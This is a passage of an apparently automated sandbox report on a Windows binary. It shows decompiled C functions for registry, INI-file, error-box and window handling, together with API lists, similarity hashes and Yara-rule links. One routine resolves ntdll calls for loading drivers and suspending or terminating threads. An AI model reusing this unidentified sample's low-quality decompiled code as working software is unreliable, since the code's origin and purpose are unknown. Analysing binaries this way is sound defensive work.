                                                                                                                0x00404705

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                0x00409d5f
                                                                                                                0x00409d67
                                                                                                                0x00409d70
                                                                                                                0x00409ddb
                                                                                                                0x00409d72
                                                                                                                0x00409d74
                                                                                                                0x00409db2
                                                                                                                0x00409d84
                                                                                                                0x00409d84
                                                                                                                0x00409d8c
                                                                                                                0x00409d8d
                                                                                                                0x00409d98
                                                                                                                0x00409d9d
                                                                                                                0x00409d9e
                                                                                                                0x00409da6
                                                                                                                0x00409daf
                                                                                                                0x00409daf
                                                                                                                0x00409dc3
                                                                                                                0x00409dc3

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                0x004047d2
                                                                                                                0x004047da
                                                                                                                0x004047e0
                                                                                                                0x004047e4
                                                                                                                0x004047ec
                                                                                                                0x004047ec
                                                                                                                0x004047f5
                                                                                                                0x00404800
                                                                                                                0x00404801
                                                                                                                0x00404802
                                                                                                                0x0040480d
                                                                                                                0x00404812
                                                                                                                0x00404813
                                                                                                                0x00404834

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                0x004068ec
                                                                                                                0x004068f0
                                                                                                                0x004068f4
                                                                                                                0x004068ff
                                                                                                                0x00406902
                                                                                                                0x0040690a
                                                                                                                0x00406910
                                                                                                                0x00406911
                                                                                                                0x0040691b
                                                                                                                0x0040691e
                                                                                                                0x00406923
                                                                                                                0x0040692d
                                                                                                                0x0040692e
                                                                                                                0x00406933
                                                                                                                0x0040693d
                                                                                                                0x00406940
                                                                                                                0x00406949
                                                                                                                0x0040694a
                                                                                                                0x00406950
                                                                                                                0x00406956
                                                                                                                0x00406959
                                                                                                                0x0040695c
                                                                                                                0x00406964
                                                                                                                0x0040696d
                                                                                                                0x00406974
                                                                                                                0x0040697e
                                                                                                                0x00406989
                                                                                                                0x00406990
                                                                                                                0x00406998
                                                                                                                0x0040699b
                                                                                                                0x0040699f
                                                                                                                0x004069b8
                                                                                                                0x004069bc
                                                                                                                0x004069c4
                                                                                                                0x004069c7
                                                                                                                0x004069c7
                                                                                                                0x004069cb
                                                                                                                0x004069ce
                                                                                                                0x004069d4
                                                                                                                0x004069d4
                                                                                                                0x004069d9
                                                                                                                0x004069df
                                                                                                                0x004069e6
                                                                                                                0x004069ea
                                                                                                                0x004069ef
                                                                                                                0x004069f2
                                                                                                                0x004069f5
                                                                                                                0x00406a00
                                                                                                                0x00406a01
                                                                                                                0x00406a06
                                                                                                                0x00406a08
                                                                                                                0x00406a0b
                                                                                                                0x00406a10
                                                                                                                0x00406a16
                                                                                                                0x00406a25
                                                                                                                0x00406a25
                                                                                                                0x00406a18
                                                                                                                0x00406a1e
                                                                                                                0x00406a1e
                                                                                                                0x00406a27
                                                                                                                0x00406a2f
                                                                                                                0x00406a32
                                                                                                                0x00406a35
                                                                                                                0x00406a3b
                                                                                                                0x00406a41
                                                                                                                0x00406a47
                                                                                                                0x00406a4d
                                                                                                                0x00406a53
                                                                                                                0x00406a5d
                                                                                                                0x00406a6d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                0x004097b1
                                                                                                                0x004097b9
                                                                                                                0x004097bb
                                                                                                                0x004097be
                                                                                                                0x004097c3
                                                                                                                0x004097ca
                                                                                                                0x004097de
                                                                                                                0x004097de
                                                                                                                0x004097e3
                                                                                                                0x004097e5
                                                                                                                0x004097e5
                                                                                                                0x004097ec
                                                                                                                0x004097f3
                                                                                                                0x004097f6
                                                                                                                0x004097fe
                                                                                                                0x00409802
                                                                                                                0x00409805
                                                                                                                0x0040980a
                                                                                                                0x0040980d
                                                                                                                0x00409810
                                                                                                                0x00409822
                                                                                                                0x00000000
                                                                                                                0x00409827
                                                                                                                0x0040982a
                                                                                                                0x004098da
                                                                                                                0x004098da
                                                                                                                0x004098dc
                                                                                                                0x004098e0
                                                                                                                0x004098e9
                                                                                                                0x004098ec
                                                                                                                0x004098f6
                                                                                                                0x004098f6
                                                                                                                0x004098e2
                                                                                                                0x00000000
                                                                                                                0x004098e2
                                                                                                                0x00409830
                                                                                                                0x00409833
                                                                                                                0x00409838
                                                                                                                0x0040983b
                                                                                                                0x0040983e
                                                                                                                0x0040985f
                                                                                                                0x0040985f
                                                                                                                0x00409861
                                                                                                                0x00409863
                                                                                                                0x0040989e
                                                                                                                0x004098b1
                                                                                                                0x004098b8
                                                                                                                0x004098c0
                                                                                                                0x004098c5
                                                                                                                0x004098d5
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x0040986c
                                                                                                                0x00409878
                                                                                                                0x0040987f
                                                                                                                0x0040988a
                                                                                                                0x0040988f
                                                                                                                0x0040988f
                                                                                                                0x0040986c
                                                                                                                0x00000000
                                                                                                                0x00409863
                                                                                                                0x00409840
                                                                                                                0x00409843
                                                                                                                0x00409846
                                                                                                                0x0040984b
                                                                                                                0x00409852
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409854
                                                                                                                0x0040985d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040985d
                                                                                                                0x00409894
                                                                                                                0x00000000
                                                                                                                0x00409894

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                0x004067ac
                                                                                                                0x004067af
                                                                                                                0x004067b5
                                                                                                                0x004067ba
                                                                                                                0x004067bf
                                                                                                                0x004067c1
                                                                                                                0x004067c6
                                                                                                                0x004067c7
                                                                                                                0x004067cc
                                                                                                                0x004067cd
                                                                                                                0x004067d2
                                                                                                                0x004067d4
                                                                                                                0x004067d9
                                                                                                                0x004067da
                                                                                                                0x004067df
                                                                                                                0x004067e0
                                                                                                                0x004067e5
                                                                                                                0x004067e7
                                                                                                                0x004067ec
                                                                                                                0x004067ed
                                                                                                                0x004067f2
                                                                                                                0x004067f3
                                                                                                                0x004067f8
                                                                                                                0x004067fa
                                                                                                                0x004067ff
                                                                                                                0x00406800
                                                                                                                0x00406805
                                                                                                                0x00406806
                                                                                                                0x00406808
                                                                                                                0x0040680f
                                                                                                                0x00406810
                                                                                                                0x00406812
                                                                                                                0x00406817
                                                                                                                0x0040681e
                                                                                                                0x00406828
                                                                                                                0x0040682b
                                                                                                                0x0040682c
                                                                                                                0x0040681e
                                                                                                                0x00406835
                                                                                                                0x00406839
                                                                                                                0x00406841

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                0x00405d03
                                                                                                                0x00405d06
                                                                                                                0x00405d10
                                                                                                                0x00405d17
                                                                                                                0x00405d22
                                                                                                                0x00405d32
                                                                                                                0x00405d40
                                                                                                                0x00405d48
                                                                                                                0x00405d4e
                                                                                                                0x00405d54
                                                                                                                0x00405d59
                                                                                                                0x00405d5c
                                                                                                                0x00405d61
                                                                                                                0x00405d67

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
